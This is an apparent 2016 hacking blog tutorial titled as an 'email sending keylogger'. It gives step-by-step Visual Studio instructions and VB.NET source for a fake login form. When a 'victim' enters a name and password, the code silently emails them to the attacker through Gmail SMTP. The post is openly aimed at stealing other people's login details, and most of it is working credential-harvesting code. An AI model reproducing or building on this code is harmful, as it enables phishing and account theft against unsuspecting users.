Tuesday 8 November 2016

Email Sending Keyloger using Visual Studio


This is email sending keyloger which means you going to code this tool with your email address so that when the victim install this tool and enters his / her login detail it wil send the logs to your email address ..whats the special thing in this tool was.. "you gonna create it"...

first install visual studio..


after that open new project  ========>> windows application

then create a layout for an tool and place the code inside that tool layout copy the below code ( coded by hackfate)


ImportsSystem.Net.Mail
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim MyMailMessage As New MailMessage()
Try
            MyMailMessage.From = New MailAddress("YOUREMAIL")
            MyMailMessage.To.Add("YOUREMAIL")
            MyMailMessage.Subject = "Log info"
            MyMailMessage.Body = "Name: " & TextBox1.Text & " / Pass: " & TextBox2.Text
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("YOUREMAIL", "YOUREMAILPASSWORD")
            SMTP.Send(MyMailMessage)
        Catch ex As Exception
End Try
End Sub
End Class




EmoticonEmoticon